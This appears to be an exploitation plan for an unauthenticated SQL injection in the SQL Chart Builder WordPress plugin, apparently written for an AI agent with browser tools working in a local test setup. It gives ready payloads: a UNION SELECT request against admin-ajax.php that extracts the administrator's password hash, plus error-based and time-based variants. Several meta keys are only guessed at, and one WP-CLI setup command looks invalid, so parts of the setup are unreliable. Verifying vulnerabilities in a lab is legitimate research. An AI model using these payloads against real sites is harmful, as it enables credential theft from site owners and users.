SQL Chart Builder < 2.3.8 - Unauthenticated SQL Injection

This exploitation research plan details the methodology for verifying the unauthenticated SQL Injection vulnerability (CVE-2026-4079) in the SQL Chart Builder plugin.

1. Vulnerability Summary

The SQL Chart Builder plugin (versions < 2.3.8) is vulnerable to SQL Injection because it uses a custom template engine to replace placeholders (e.g., {arg1}, {variable_name}) within SQL queries with user-supplied input from $_REQUEST. This replacement is performed using simple string manipulation (likely str_replace) without applying wpdb::prepare() or esc_sql() to the incoming values. Consequently, an attacker can supply a malicious payload that "breaks out" of the intended query logic to execute arbitrary SQL commands.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: guaven_sqlcharts_get_data (Unauthenticated)
• Vulnerable Parameter: Any parameter name that matches a placeholder defined in the chart's SQL query (e.g., arg1, my_filter).
• Required Parameter: id (The WordPress Post ID of the gvn_schart object).
• Authentication: None required (the action is registered via wp_ajax_nopriv_).

3. Code Flow

1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php with the action guaven_sqlcharts_get_data.
2. Chart Loading: The handler retrieves the id from the request and fetches the corresponding gvn_schart post from the database.
3. SQL Template Retrieval: The handler reads the SQL query template stored in the post's metadata (likely the guaven_sqlcharts_sql or gvn_sql_code meta key).
4. Insecure Replacement: The handler parses the SQL template for placeholders like {...}. For each placeholder, it looks for a corresponding key in $_POST or $_GET.
5. Sink: The handler performs a str_replace of the placeholder with the raw user input and then passes the resulting "poisoned" string directly to $wpdb->get_results().

4. Nonce Acquisition Strategy

Historically, the guaven_sqlcharts_get_data action in this plugin did not enforce nonce verification for frontend chart rendering to facilitate dynamic filters. However, if a nonce is required, it will be localized in the page source where a chart is displayed.

Strategy:

1. Identify the JavaScript variable used for nonces. Based on functions.php, the plugin uses guaven_sqlcharts_notice_dismissed for some actions. For data fetching, look for a variable named guaven_sqlcharts_ajax or similar.
2. Create a test page containing the chart shortcode: wp post create --post_type=page --post_status=publish --post_content='[gvn_schart_2 id="REPLACE_WITH_CHART_ID"]'.
3. Navigate to this page using browser_navigate.
4. Extract the nonce via browser_eval:

   // Inferred nonce location based on plugin naming conventions
   window.guaven_sqlcharts_ajax?.nonce || window.gvn_sql_nonce
   

5. If no nonce is found and the request fails with -1, audit the HTML for any hidden inputs or localized JS objects containing "nonce".

5. Exploitation Strategy

The goal is to use a UNION SELECT to extract the administrator's password hash from the wp_users table.

Step 1: Setup the Target Chart
An attacker needs a chart ID to target. Since we are in a controlled environment, we will create one with a known placeholder.

Step 2: Column Discovery
The payload must match the number of columns in the original query. We will use ORDER BY to find this number.

Step 3: Data Extraction
Once the column count is known, we use UNION SELECT to leak the user_pass for the user with ID=1.

HTTP Request (Example):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=guaven_sqlcharts_get_data&id=[CHART_ID]&id_tag=0 UNION SELECT 1,user_pass,3,4 FROM wp_users WHERE ID=1-- -

(Note: The parameter id_tag must match the placeholder {id_tag} in the SQL we define in step 6).

6. Test Data Setup

Prepare the environment using WP-CLI to create a vulnerable chart entry.

# 1. Create the Chart Post
CHART_ID=$(wp post create --post_type=gvn_schart --post_title="Sqli Test" --post_status=publish --porcelain)

# 2. Set the SQL Template Meta (Inferred meta keys: gvn_sql_code)
# We use a placeholder {id_tag} which we will control via AJAX
wp post primary-setup $CHART_ID --meta_input='{"gvn_sql_code": "SELECT post_title, post_date, post_author, ID FROM wp_posts WHERE ID = {id_tag}"}'

# 3. Define the dynamic filter (Required for the plugin to recognize the tag)
# Format: variable_name~default_value~label~type
wp post meta set $CHART_ID gvn_sql_vars "id_tag~1~ID~number"

# 4. Create a public page to view the chart (and potentially extract nonces)
PAGE_ID=$(wp post create --post_type=page --post_title="Chart Page" --post_status=publish --post_content="[gvn_schart_2 id=\"$CHART_ID\"]" --porcelain)

7. Expected Results

A successful exploit will return a JSON object where one of the fields contains the WordPress password hash (starting with $P$ or $wp$).

Example Successful JSON Response:

[
  {
    "post_title": "$P$Bv8J3...", 
    "post_date": "3",
    "post_author": "4",
    "ID": "1"
  }
]

8. Verification Steps

After performing the HTTP request, verify the leaked hash against the actual database:

# Verify the hash matches the one in the database
wp db query "SELECT user_pass FROM wp_users WHERE ID=1"

9. Alternative Approaches

• Error-Based SQLi: If the output is suppressed but errors are displayed (common if WP_DEBUG is on), use updatexml() or extractvalue():
  • id_tag=1 AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)
• Time-Based Blind: If neither UNION nor errors work, use SLEEP():
  • id_tag=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)
• Parameter variations: If id_tag doesn't work, try arg1, arg2, etc., as these are hardcoded defaults in some versions of the plugin's shortcode handler.